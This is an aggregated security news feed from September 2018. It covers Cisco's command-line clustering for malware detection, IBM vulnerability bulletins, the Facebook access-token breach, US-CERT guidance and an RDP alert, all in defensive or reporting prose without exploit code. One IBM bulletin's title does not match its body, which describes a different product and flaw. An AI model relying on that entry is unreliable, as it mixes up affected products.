Saturday, September 29, 2018

Co-authored with: Jan Jusko, Harry Nayyar, and Danila Khikhlukha.

Adversaries continue to evolve their techniques to evade detection. Static analysis approaches are prone to evasion using malicious packers, code obfuscation, and polymorphism. That means that the vast majority of malware is unique to each target, and that poses an on-going challenge for traditional endpoint security solutions. At the same time, dynamic analysis generally performed in a sandbox environment has its own challenges around sandbox detection and evasion techniques. Malware authors like to play dirty tricks in defenders’ sandboxes.

Given that fact it would be optimistic to expect organizations to be able to catch up on their own, it is not only about the rapid pace of change that is challenging individual defender groups, but it’s also the sophistication and the scale of these attacks.

Overcoming The Challenges

Mindfully listening and understanding the most critical needs of our customers is vital for us. Helping solve those challenges is the core of our work at Cisco. We strive to do so by continuously improving existing, as well as exploring new ways to make security teams more effective at what they do – protecting their organizations. With over 12 years of research experience, more than 80 machine learning scientists and engineers, and 60 patents and fillings, Cisco Cognitive Intelligence group along with the AMP research team are committed to helping customers achieve shared security goals.

In our previous blog post, Cognitive Intelligence: Empowering Security Analysts, Defeating Polymorphic Malware (Part 1), we showed how Cognitive Intelligence helps detect and prioritize breaches while providing context-rich (and organization-tailored) threat knowledge to incident response teams and how that knowledge helps focus on alerts that really matter. We have also looked at one of the recently implemented algorithms (Probabilistic Threat Propagation) that helps scale up the number of retrospectively convicted polymorphic malware samples through knowledge sharing between multiple threat intelligence sources available in the Cisco Security portfolio.

In this blog post, we present some of the steps that Cisco takes to improve detection efficacy even further by taking the same data and looking at it from a different angle. Cisco AMP for Endpoints is now able to convict polymorphic and evasive malware variants based on the command line arguments observed during sample execution. This capability also facilitates the automated creation of Cloud IOCs, increasing the threat landscape coverage and providing actionable alerts with greater level of detail and context. This blog explores how we’re building a reliable training set in a big data environment, how we use it for data clustering, and how we created an automated process for generation and vetting of newly-created Cloud IOCs.

Cloud IOCs

In AMP for Endpoints, Cloud IOCs are one of the most effective post-infection detection capabilities that helps security teams surface malicious or suspicious behaviors observed on an endpoint. Quite often this represents a combination of individual events that together likely have malicious intent.

Registry keys were modified to maintain persistence
Microsoft Word launched PowerShell using VBA macro
A suspicious scheduled task was created using schtasks command
WMI command tool was used to execute a command on a remote computer
PowerShell attempted to download content into a string or download a file and execute it

Examples above represent just a tiny fraction of behaviours that can be attributed by Cloud IOCs. The goal here is to help analysts come up with the right response action by combining the knowledge of their environment with the details provided in the alert.

Example Cloud IOC: W32.PowershellDownloadedExecutable.ioc

Cisco research teams drive all of these indicators. And while we always prioritize quality, in this case, quantity is also important, as we observe adversaries utilizing new techniques daily. There are a couple of ways to increase the quantity of the behaviors being monitored. Conduct more research to create new Cloud IOCs manually. Or create new methods that would allow for automated generation of IOCs at scale to provide more comprehensive coverage. With automation like that security teams can focus on actionable alerts pin-pointed by the algorithm (described further). Since Cloud IOCs trigger on malicious behavior, it means that they represent threats that were not prevented by other layers of security.

What’s New in 2018: Command Line Argument Clustering

Let’s go over one example algorithm that is designed to uncover previously unknown or evasive malware, convict polymorphic instances of known threats, and then turn these results into prevention capability. Given the architectural framework in which all of the AMP-enabled devices operate, this intelligence becomes immediately available for enforcement across the entire security architecture.

Command Line Argument Clustering is an algorithm that enables automated generation of Cloud IOCs at scale. It, therefore, improves the detection of malicious binaries based on their behavior as observed on the endpoint systems with an engine to monitor process executions (AMP for Endpoints).

The specific focus of the algorithm is on command line arguments used to execute binaries. The choice of command line arguments for the Cloud IOCs is based on the fact that these arguments are often associated with various malware families. The idea for this algorithm came up during discussions about shortcomings of the more traditional static and dynamic analysis approaches. Command Line Clustering Algorithm complements them and provides a level of security above them. The algorithm does not have to rely on an assessment of sample properties to evaluate maliciousness. At the same time, it does not require samples to run through dynamic analysis.

The IOCs resulting from command line clustering can represent known or unknown malware families. As such, some clusters may be considered classified when a known malware family is associated with a given cluster after research. On the other hand, when no single known malware family can be associated with a cluster, or where such attribution would require further research, an equally actionable, but less descriptive unclassified IOC can be created. Below are two examples of automatically generated Cloud IOCs: classified and unclassified.

Classified Auto-generated Cloud IOC: W32.Dealply2.ioc. In the classified event, there is a mention of specific malware family (DealPly Adware in the example above) and its known methods.

Unclassified Auto-generated Cloud IOC: W32.Generic.1682.cam.ioc. In the unclassified (generic) event, we see a behavioral profile that demonstrates malicious action, without attribution to a particular malware family.

There are hundreds of thousands new malicious binaries that are generated by attackers daily. These malware samples belong to a variety of malware families. It is therefore infeasible to analyze any significant portion of them manually and create detection content based on the results of such analysis. In this research, we analyze command line arguments that are passed to a binary upon execution. The goal is to cluster binaries utilizing similar sets of command line arguments together and automatically build Cloud IOCs that detect these common families with high precision. The key to success here is availability of large amounts of balanced telemetry to be processed by the algorithm (and that is where we benefit from the large install base of AMP for Endpoints).

The algorithm progressively goes through the following steps in an automated fashion:

Data Collection, Transformation, and Clustering – collecting telemetry from executions of malicious, legitimate, and unknown binaries. Parsing command line arguments of all executed binaries to further process only named arguments. Constructing and clustering a graph that captures pairwise similarities of captured executions.
Cloud IOC Selection – creating candidate Cloud IOCs from clusters of executions produced in a previous step (for each cluster, command line arguments that provide the best coverage and precision are selected as an IOC) and then filtering out clusters containing legitimate binaries. Prioritizing clusters using various criteria (such as clusters containing execution of high-risk malware or clusters containing high number of unique binary files). And finally converting clusters into Cloud IOCs by selecting command line arguments that are typical for a particular cluster.
Cloud IOC Vetting – running newly created IOCs on the in-field telemetry and monitoring their performance to later deploy those that ensure high accuracy for in-field malware detection. If all command line arguments contained in an IOC are present during sample execution (or if certain arguments are absent as opposed to that), a Cloud IOC triggers a detection notifying a security analyst about a potential compromise

The Command Line Argument Clustering algorithm proves to be effective as different polymorphic malware families often use the same set of command line arguments. These are the arguments that shouldn’t be observed next to the known benign files. Modern malware is complex and can consist of multiple components and often, a dropper component is responsible for execution of a malicious binary. This dropper passes specific and unique command line arguments to the malicious binary. For example, a dropper that executes a ransomware binary can pass in the amount of ransom to demand as a command line argument. While the argument values can vary on a per-target or per-campaign basis, the argument name often remains the same and can be used as an effective indicator of compromise.

The elegance of Command Line Clustering is that it further increases coverage against today’s advanced threats. Though it is fully automated, it can also be guided by Cisco’s research team to ensure the highest level of efficacy. It also does not present any computational costs to customers running AMP for Endpoints in their environments, as the processing is done in the Cisco Cloud infrastructure. The binaries that trigger generated Cloud IOCs are retrospectively marked malicious in the AMP Cloud further decreasing the average Time To Detect value. That also turns this capability into prevention that benefits all customers leveraging AMP in their environments (AMP for Email Security, WSA, NGFW, NGIPS, Umbrella and of course Endpoints).

If you are using AMP for Endpoints in your environment today, make sure to enable Command Line Capture capability to immediately benefit from the efficacy improvements.

Conclusion

Command Line Argument Clustering algorithm is an innovative weapon that works for security analysts to help uncover evasive malware and morphing threats in their environments. What previously required dedicated team members to put in hours of threat hunting or manual analysis work, is now naturally automated. In the world where attackers continuously come up with new techniques to bypass means of traditional malware prevention, security teams should be empowered to move the security needle further. And in the end, it’s important to remember that nobody wins alone. For long-lasting results, and more consistent and predictable outcomes, it’s always best to act as a team that shares the same vision and goals. Check in for updates on other research work that Cisco is doing to help customers in their day-to-day battles in Part 3 of this blog series.

Additional Resources

AMP for Endpoints: http://cisco.com/go/ampendpoint

AMP for Endpoints Protection Lattice

Learn how to operationalize Cisco’s Advanced Threat Security portfolio: Behind The Perimeter – Fighting Advanced Adversaries

from Cisco Blog » Security https://ift.tt/2y2kNtE

IBM Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability

IBM Security Guardium has addressed the following vulnerability.

CVE(s): CVE-2018-11776

Affected product(s) and affected version(s):

The post IBM Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium	Affected Versions
IBM Security Guardium	10.1.4-10.5

from IBM Product Security Incident Response Team https://ift.tt/2xNmAnk

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM i

There are multiple vulnerabilities in IBM® SDK Java Technology Edition that is used by IBM i.

CVE(s): CVE-2018-2964, CVE-2018-2973, CVE-2018-2940, CVE-2018-2952, CVE-2018-1656, CVE-2018-12539, CVE-2018-1517, CVE-2016-0705, CVE-2017-3732, CVE-2017-3736

Affected product(s) and affected version(s):

Releases 7.1, 7.2 and 7.3 of IBM i are affected.

The post IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM i appeared first on IBM PSIRT Blog.

from IBM Product Security Incident Response Team https://ift.tt/2xNmyfc

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium

There are multiple vulnerabilities in IBM® SDK Java Technology Edition, Version 6 used by IBM Security Guardium. These issues were disclosed as part of the IBM Java SDK updates in July 2018.

CVE(s): CVE-2017-3736, CVE-2017-3732, CVE-2016-0705, CVE-2018-1517, CVE-2018-1656, CVE-2018-2964, CVE-2018-2973, CVE-2018-2952, CVE-2018-2940, CVE-2018-12539

Affected product(s) and affected version(s):

IBM Security Guardium V10.0 – 10.5

The post IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium appeared first on IBM PSIRT Blog.

from IBM Product Security Incident Response Team https://ift.tt/2xMQgRA

IBM Security Bulletin: Cross-site scripting vulnerabilities affect multiple IBM Rational products based on IBM Jazz technology

Sep 29, 2018 9:01 am EDT

Categorized: Medium Severity

Share this post:

Cross-site scripting vulnerabilities affect multiple products: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM) and Rational Software Architect Design Manager (RSA DM).

CVE(s): CVE-2018-1558, CVE-2018-1689

Affected product(s) and affected version(s):

Rational Collaborative Lifecycle Management 5.0 – 6.0.6

Rational Quality Manager 5.0 – 5.0.2
Rational Quality Manager 6.0 – 6.0.6

Rational Team Concert 5.0 – 5.0.2
Rational Team Concert 6.0 – 6.0.6

Rational DOORS Next Generation 5.0 – 5.0.2
Rational DOORS Next Generation 6.0 – 6.0.6

Rational Engineering Lifecycle Manager 5.0 – 5.0.2
Rational Engineering Lifecycle Manager 6.0 – 6.0.6

Rational Rhapsody Design Manager 5.0 – 5.0.2
Rational Rhapsody Design Manager 6.0 – 6.0.6

Rational Software Architect Design Manager 5.0 – 5.0.2
Rational Software Architect Design Manager 6.0 – 6.0.1

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www.ibm.com/support/docview.wss?uid=ibm10732477
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/142956
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/145508

from IBM Product Security Incident Response Team https://ift.tt/2xNmw74

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs)

There are multiple vulnerabilities in IBM® Runtime Environment Java Technology Edition, Versions 6, 7 and 8 that are used by Tivoli Netcool/OMNIbus. These were disclosed as part of the IBM Java SDK updates in April 2018 and July 2018.

CVE(s): CVE-2018-2783, CVE-2018-2814, CVE-2018-1656, CVE-2018-12539

Affected product(s) and affected version(s):

Tivoli Netcool/OMNIbus 7.4.0
Tivoli Netcool/OMNIbus 8.1.0

The post IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs) appeared first on IBM PSIRT Blog.

from IBM Product Security Incident Response Team https://ift.tt/2xNmuvY

IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerability

IBM Security Guardium has addressed the following vulnerabilities.

CVE(s): CVE-2017-8039, CVE-2017-4971, CVE-2016-9878

Affected product(s) and affected version(s):

The post IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium	Affected Versions
IBM Security Guardium	10.5

from IBM Product Security Incident Response Team https://ift.tt/2xLbAH7

IBM Security Bulletin: IBM Security Guardium is affected by a Improper Certificate Validation vulnerability

Sep 26, 2018 9:00 am EDT | Low Severity

A vulnerability in CKEditor might affect IBM WebSphere Portal. CVE(s): Affected product(s) and affected version(s): Affected Product Affected Versions IBM WebSphere Portal 9.0.0.0 – 9.0.0.0 CF15 IBM WebSphere Portal 8.5.0.0 – 8.5.0.0 CF15 IBM WebSphere Portal 8.0.0.0 – 8.0.0.1 CF22 Refer to the following reference URLs for remediation and additional vulnerability details:Source Bulletin: https://ift.tt/2xNmr3g Database: ...read more

from IBM Product Security Incident Response Team https://ift.tt/2xN0YaN

IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerabilities

IBM Security Guardium has addressed the following vulnerabilities.

CVE(s): CVE-2015-8100, CVE-2015-5621, CVE-2014-3565

Affected product(s) and affected version(s):

The post IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerabilities appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium	Affected Versions
IBM Security Guardium	10.5

from IBM Product Security Incident Response Team https://ift.tt/2xMbGy1

IBM Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability

IBM Security Guardium has addressed the following vulnerability.

CVE(s): CVE-2018-1501

Affected product(s) and affected version(s):

The post IBM Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium	Affected Versions
IBM Security Guardium	10.5

from IBM Product Security Incident Response Team https://ift.tt/2xNmpZc

IBM Security Bulletin: IBM Security Guardium is affected by a Password in Clear Text vulnerability

IBM Security Guardium has addressed the following vulnerability.

CVE(s): CVE-2018-1498

Affected product(s) and affected version(s):

The post IBM Security Bulletin: IBM Security Guardium is affected by a Password in Clear Text vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium	Affected Versions
IBM Security Guardium	10.5

from IBM Product Security Incident Response Team https://ift.tt/2xOMc30

Facebook Hacked — 10 Important Updates You Need To Know About

If you also found yourself logged out of Facebook on Friday, you are not alone.

Facebook forced more than 90 million users to log out and back into their accounts in response to a massive data breach.

On Friday afternoon, the social media giant disclosed that some unknown hackers managed to exploit three vulnerabilities in its website and

steal data from 50 million users

and that as a precaution, the company reset access tokens for nearly 90 million Facebook users.

covered a story

yesterday based upon the information available at that time.

Facebook Hack: 10 Important Updates You Need To Know About

However, in a conference call [

Transcript 1

Transcript 2

] with reporters, Facebook vice president of product Guy Rosen shared a few more details of the terrible breach, which is believed to be the most significant security blunder in Facebook's history.

Here's below we have briefed the new developments in the Facebook data breach incident that you need to know about:

1.) Facebook Detected Breach After Noticing Unusual Traffic Spike

— Earlier this week, Facebook security team noticed an unusual traffic spike on its servers, which when investigated revealed a massive cyber attack, that had been ongoing since 16 September, aimed at stealing data of millions of Facebook users.

2.) Hackers Exploited Total 3 Facebook Vulnerabilities

— The hack was accomplished using three distinct bugs of Facebook in combination.

The

first bug incorrectly offered users a video uploading option within certain posts that enables people to wish their friends 'Happy Birthday,' when accessed on "View As" page.

The

second bug

was in the video uploader that incorrectly generated an access token that had permission to log into the Facebook mobile app, which is otherwise not allowed.

The third bug was that the generated access token was not for you as the viewer, but for the user that you were looking up, giving attackers an opportunity to steal the keys to access an account of the person they were simulating.

3.) Hackers Stole Secret Access Tokens for 50 Million Accounts

— The attackers walked away with secret access tokens for as many as 50 million Facebook users, which could then be used to take over accounts.

Access Tokens "are the equivalent of digital keys that keep people logged in to Facebook, so they don't need to re-enter their password every time they use the app."

4.) Your Facebook Account Password Has Not Been Compromised, But, Wait!

— The good news is that the attack did not reveal your Facebook account passwords, but here’s the bad news — it’s not even required.

An application or an attacker can use millions of secret access tokens to programmatically fetch information from each account using an API, without actually having your password or two-factor authentication code.

5.) Hackers Downloaded Users' Private Information Using Facebook API

— Although it is not clear how many accounts and what personal information was accessed by hackers before Facebook detected the incident, the year-old vulnerabilities had left all your personal information, private messages, photos and videos wide open for hackers.

"Since we’ve only just started our investigation, we have yet to determine whether these accounts were misused or any information accessed," the company said.

6.) Your "Logged in as Facebook" Accounts at 3rd-Party Apps/Websites Are At Risk

— Since secret tokens enabled attackers to access accounts as the account holder themselves, it could have allowed them to access other third-party apps that were using Facebook login — a feature that lets you sign up for, and log in to, other online services using your Facebook credentials.

7.) Facebook Reset Access Tokens for 90 Million Accounts

— In response to the massive breach, Facebook reset access tokens for nearly 50 million affected Facebook accounts and an additional 40 million accounts, as a precaution. This means that nearly 90 Million Facebook users were logged out of their accounts on Friday.

8.) Check Active Sessions on Facebook to Find If Your Account Have Been Hacked

— Many Facebook users have noticed unknown IP addresses from foreign locations that apparently had accessed their account unauthorizedly.

You can head on to "Account Settings → Security and Login → Where You're Logged In" to review the list of devices and their location that have accessed your Facebook account.

If you found any suspicious session that you never logged in, you can revoke back the access in just one click.

9.) Breach Isn't Connected to the Hacker Who Pledged to Delete Zuckerberg's Personal Page

— Earlier this week, a Taiwanese hacker, Chang Chi-Yuang, claimed that he would demonstrate a critical zero-day vulnerability in Facebook by broadcasting himself hacking Mark Zuckerberg's Facebook page on Sunday.

However, it is not clear whether the latest Facebook breach has anything to do with Chang's hack, at least Facebook does not believe so.

Besides this, Chang Chi-Yuang Today says he canceled the stream and reported the bug to Facebook.

10.) Facebook Faces Class-Action Lawsuit Over The Massive Hack

— Just after the news of the breach went public, two residents, Carla Echavarria from California and another from Virginia,

filed

a class-action complaint against the social media giant in US District Court for the Northern District of California.

Both allege that Facebook failed to protect their and additional potential class members data from going into wrong hands due to its

lack of proper security practices

The social media giant has already been facing criticism on handling of user data and its privacy policies in the wake of the

Cambridge Analytica scandal

, in which personal data of 87 million Facebook users was sold to and misused by a

data-mining firm without their consent

Facebook has already reset account logins for tens of millions of users and is also advising affected users who had Instagram or Oculus accounts linked to their Facebook account to de-link and than link those accounts again so that the access tokens can be changed.

The vulnerabilities exploited by the hackers are fixed, and Facebook is working with the FBI to investigate the security incident, which has impacted approximately 2.5% of Facebook users of its over 2 billion user base.

Since the investigation is still in the early stages, Facebook has yet to determine whether the attackers misused the stolen access tokens for 50 million accounts or if any information was accessed.

from The Hacker News https://ift.tt/2DERC6b

Friday, September 28, 2018

Facebook says it detected security breach after traffic spike

India's Supreme Court strips Universal ID scheme of its overreach but retains its essence

Facebook discloses network breach affecting 50 million user accounts

Hackers Steal 50 Million Facebook Users’ Access Tokens Using Zero-Day Flaw

2018 has been a terrible year for Facebook.

Facebook just admitted that an unknown hacker or a group of hackers exploited a zero-day vulnerability in its social media platform that allowed them to steal secret access token for more than 50 million accounts.

In a brief

blog post

published Friday, Facebook revealed that its security team discovered the attack three days ago (on 25 September), and they are still investigating the security incident.

"We're taking this incredibly seriously and wanted to let everyone know what's happened and the immediate action we've taken to protect people's security," Facebook said.

The vulnerability, which has yet not been disclosed and now patched by Facebook, resided in the "View As" feature—an option that allows users to find out what other Facebook users would see if they visit your profile.

According to the social media giant, the vulnerability allowed hackers to steal secret access tokens that could then use to take over user accounts.

Secret access tokens "are the equivalent of digital keys that keep people logged in to Facebook, so they don't need to re-enter their password every time they use the app."

To prevent its users' accounts, the company has already reset access tokens for nearly 50 million affected Facebook accounts and an additional 40 million accounts, as a precaution.

"As a result, around 90 million people will now have to log back in to Facebook, or any of their apps that use Facebook Login. After they have logged back in, people will get a notification at the top of their News Feed explaining what happened," the company said.

Facebook has also notified law enforcement officials of the security breach.

The story is developing...

from The Hacker News https://ift.tt/2OhcN2q

Python is a hit with hackers, report finds

ST18-248: Protecting Against Malicious Code

Original release date: September 28, 2018

What is malicious code?

Malicious code is unwanted files or programs that can cause harm to a computer or compromise data stored on a computer. Various classifications of malicious code include viruses, worms, and Trojan horses.

Viruses have the ability to damage or destroy files on a computer system and are spread by sharing an already infected removable media, opening malicious email attachments, and visiting malicious web pages.
Worms are a type of virus that self-propagates from computer to computer. Its functionality is to use all of your computer’s resources, which can cause your computer to stop responding.
Trojan Horses are computer programs that are hiding a virus or a potentially damaging program. It is not uncommon that free software contains a Trojan horse making a user think they are using legitimate software, instead the program is performing malicious actions on your computer.

How can you protect yourself against malicious code?

Following these security practices can help you reduce the risks associated with malicious code:

Install and maintain antivirus software. Antivirus software recognizes malware and protects your computer against it. Installing antivirus software from a reputable vendor is an important step in preventing and detecting infections. Always visit vendor sites directly rather than clicking on advertisements or email links. Because attackers are continually creating new viruses and other forms of malicious code, it is important to keep your antivirus software up-to-date.
Use caution with links and attachments. Take appropriate precautions when using email and web browsers to reduce the risk of an infection. Be wary of unsolicited email attachments and use caution when clicking on email links, even if they seem to come from people you know. (See Using Caution with Email Attachments for more information.)
Block pop-up advertisements. Pop-up blockers disable windows that could potentially contain malicious code. Most browsers have a free feature that can be enabled to block pop-up advertisements.
Use an account with limited permissions. When navigating the web, it is a good security practice to use an account with limited permissions. If you do become infected, restricted permissions keep the malicious code from spreading and escalating to an administrative account.
Disable external media AutoRun and AutoPlay features. Disabling AutoRun and AutoPlay features prevents external media infected with malicious code from automatically running on your computer.
Change your passwords. If you believe your computer is infected, change your passwords. This includes any passwords for websites that may have been cached in your web browser. Create and use strong passwords, making them difficult for attackers to guess. (See Choosing and Protecting Passwords and Supplementing Passwords for more information.)
Keep software updated. Install software patches on your computer so attackers do not take advantage of known vulnerabilities. Consider enabling automatic updates, when available. (See Understanding Patches and Software Updates for more information.)
Back up data. Regularly back up your documents, photos, and important email messages to the cloud or to an external hard drive. In the event of an infection, your information will not be lost.
Install or enable a firewall. Firewalls can prevent some types of infection by blocking malicious traffic before it enters your computer. Some operating systems include a firewall; if the operating system you are using includes one, enable it. (See Understanding Firewalls for Home and Small Office Use for more information.)
Use anti-spyware tools. Spyware is a common virus source, but you can minimize infections by using a program that identifies and removes spyware. Most antivirus software includes an anti-spyware option; ensure you enable it.
Monitor accounts. Look for any unauthorized use of, or unusual activity on, your accounts—especially banking accounts. If you identify unauthorized or unusual activity, contact your account provider immediately.
Avoid using public Wi-Fi. Unsecured public Wi-Fi may allow an attacker to intercept your device’s network traffic and gain access to your personal information.

What do you need to know about antivirus software?

Antivirus software scans computer files and memory for patterns that indicate the possible presence of malicious code. You can perform antivirus scans automatically or manually.

Automatic scans – Most antivirus software can scan specific files or directories automatically. New virus information is added frequently, so it is a good idea to take advantage of this option.
Manual scans – If your antivirus software does not automatically scan new files, you should manually scan files and media you receive from an outside source before opening them, including email attachments, web downloads, CDs, DVDs, and USBs.

Although anti-virus software can be a powerful tool in helping protect your computer, it can sometimes induce problems by interfering with the performance of your computer. Too much antivirus software can affect your computer’s performance and the software’s effectiveness.

Investigate your options in advance. Research available antivirus and anti-spyware software to determine the best choice for you. Consider the amount of malicious code the software recognizes and how frequently the virus definitions are updated. Also, check for known compatibility issues with other software you may be running on your computer.
Limit the number of programs you install. Packages that incorporate both antivirus and anti-spyware capabilities together are now available. If you decide to choose separate programs, you only need one antivirus program and one anti-spyware program. Installing more programs increases your risk for problems.

There are many antivirus software program vendors, and deciding which one to choose can be confusing. Antivirus software programs all typically perform the same type of functions, so your decision may be based on recommendations, features, availability, or price. Regardless of which package you choose, installing any antivirus software will increase your level of protection.

How do you recover if you become a victim of malicious code?

Using antivirus software is the best way to defend your computer against malicious code. If you think your computer is infected, run your antivirus software program. Ideally, your antivirus program will identify any malicious code on your computer and quarantine them so they no longer affect your system. You should also consider these additional steps:

Minimize the damage. If you are at work and have access to an information technology (IT) department, contact them immediately. The sooner they can investigate and “clean” your computer, the less likely it is to cause additional damage to your computer—and other computers on the network. If you are on a home computer or laptop, disconnect your computer from the internet; this will prevent the attacker from accessing your system.
Remove the malicious code. If you have antivirus software installed on your computer, update the software and perform a manual scan of your entire system. If you do not have antivirus software, you can purchase it online or in a computer store. If the software cannot locate and remove the infection, you may need to reinstall your operating system, usually with a system restore disk. Note that reinstalling or restoring the operating system typically erases all of your files and any additional software that you have installed on your computer. After reinstalling the operating system and any other software, install all of the appropriate patches to fix known vulnerabilities.

Threats to your computer will continue to evolve. Although you cannot eliminate every hazard, by using caution, installing and using antivirus software, and following other simple security practices, you can significantly reduce your risk and strengthen your protection against malicious code.

Author: NCCIC

This product is provided subject to this Notification and this Privacy & Use policy.

from US-CERT National Cyber Alert System https://ift.tt/2xVT91K

BlackBerry beats Q2 targets, cites growth in automotive vertical

FBI solves mystery surrounding 15-year-old Fruitfly Mac malware

IC3 Issues Alert on RDP Exploitation

Original release date: September 28, 2018

The Internet Crime Complaint Center (IC3), in collaboration with DHS and the Federal Bureau of Investigation, has released an alert on cyber threat actors maliciously using legitimate remote administration tools, such as Remote Desktop Protocol (RDP). Threat actors identify and exploit vulnerable RDP sessions to facilitate credential theft and ransomware infection.

NCCIC encourages users and administrators to review the IC3 Alert and the NCCIC Tips on Securing Network Infrastructure Devices and Choosing and Protecting Passwords. If you believe you are a victim of cybercrime, file a complaint with IC3 at www.ic3.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

from US-CERT National Cyber Alert System https://ift.tt/2Qg31ee

Threat Roundup Sept 21 – 28

Threat Research

Threat Roundup Sept 21 – 28

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Sept. 21 and 28. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read_More>>

Tags:

from Cisco Blog » Security https://ift.tt/2xW4VsK

IBM Security Bulletin: PowerKVM has released fixes in response to the vulnerabilities known as Foreshadow

Sep 28, 2018 9:01 am EDT

Categorized: High Severity

Share this post:

PowerKVM is affected by vulnerabilities in the Linux kernel. IBM has now addressed these vulnerabilities. Note that, although the CVE descriptions do not reference POWER, POWER CPUs are afftected.

CVE(s): CVE-2018-3620

Affected product(s) and affected version(s):

PowerKVM 3.1

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www.ibm.com/support/docview.wss?uid=ibm10733108
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148318

from IBM Product Security Incident Response Team https://ift.tt/2zCfpQ9

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM SPSS Statistics

Sep 28, 2018 9:00 am EDT

Categorized: High Severity

Share this post:

There are multiple vulnerabilities in IBM® Runtime Environment Java™ Versions 6.0, 7.0, 7.1, and 8.0 used by IBM SPSS Statistics. IBM SPSS Statistics has addressed the applicable CVEs.

CVE(s): CVE-2018-1656, CVE-2018-12539

Affected product(s) and affected version(s):

IBM SPSS Statistics 21.0.0.2
IBM SPSS Statistics 22.0.0.2
IBM SPSS Statistics 23.0.0.3
IBM SPSS Statistics 24.0.0.2
IBM SPSS Statistics 25.0.0.1

from IBM Product Security Incident Response Team https://ift.tt/2zCfnI1

IBM Security Bulletin: Impersonation Issue Affects IBM WebSphere Portal (CVE-2018-1672)

Sep 28, 2018 9:00 am EDT

Categorized: Medium Severity

Share this post:

Impersonation may lead to incorrect user context in IBM WebSphere Portal (CVE-2018-1672)

CVE(s): CVE-2018-1672

Affected product(s) and affected version(s):

Affected Product	Affected Versions
IBM WebSphere Portal	9.0.0.0 – 9.0.0.0 CF15
IBM WebSphere Portal	8.5.0.0 – 8.5.0.0 CF15
IBM WebSphere Portal	8.0.0.0 – 8.0.0.1 CF23
IBM WebSphere Portal	7.0.0.0 – 7.0.0.2 CF30

For unsupported versions IBM recommends upgrading to a fixed, supported version of the product.

from IBM Product Security Incident Response Team https://ift.tt/2zCeTBH

IBM Security Bulletin: Security Misconfiguration during Combined Cumulative Fix Installation Affects IBM WebSphere Portal (CVE-2018-1420)

Sep 28, 2018 9:00 am EDT

Categorized: Medium Severity

Share this post:

IBM WebSphere Portal resets access control settings to the out of the box configuration during Combined Cumulative Fix (CF) installation. This can lead to security miss-configuration of the installation (CVE-2018-1420).

CVE(s): CVE-2018-1420

Affected product(s) and affected version(s):

Affected Product	Affected Versions
IBM WebSphere Portal	9.0.0.0 – 9.0.0.0 CF15
IBM WebSphere Portal	8.5.0.0 – 8.5.0.0 CF15
IBM WebSphere Portal	8.0.0.0 – 8.0.0.1 CF22
IBM WebSphere Portal	7.0.0.0 – 7.0.0.2 CF30

For unsupported versions IBM recommends upgrading to a fixed, supported version of the product.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=swg22014276
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/138950

from IBM Product Security Incident Response Team https://ift.tt/2zCeQWx

CVE and Cloud Services, Part 2: Impacts on Cloud Vulnerability and Risk Management

By Victor Chin, Research Analyst, Cloud Security Alliance, and Kurt Seifried, Director of IT, Cloud Security Alliance

This is the second post in a series, where we’ll discuss cloud service vulnerability and risk management trends in relation to the Common Vulnerability and Exposures (CVE) system. In the first blog post, we wrote about the Inclusion Rule 3 (INC3) and how it affects the counting of cloud service vulnerabilities. Here, we will delve deeper into how the exclusion of cloud service vulnerabilities impacts enterprise vulnerability and risk management.

Traditional vulnerability and risk management

CVE identifiers are the linchpin of traditional vulnerability management processes. Besides being an identifier for vulnerabilities, the CVE system allows different services and business processes to interoperate, making enterprise IT environments more secure. For example, a network vulnerability scanner can identify whether a vulnerability (e.g. CVE-2018-1234) is present in a deployed system by querying said system.

The queries can be conducted in many ways, such as via a banner grab, querying the system for what software is installed, or even via proof of concept exploits that have been de-weaponized. Such queries confirm the existence of the vulnerability, after which risk management and vulnerability remediation can take place.

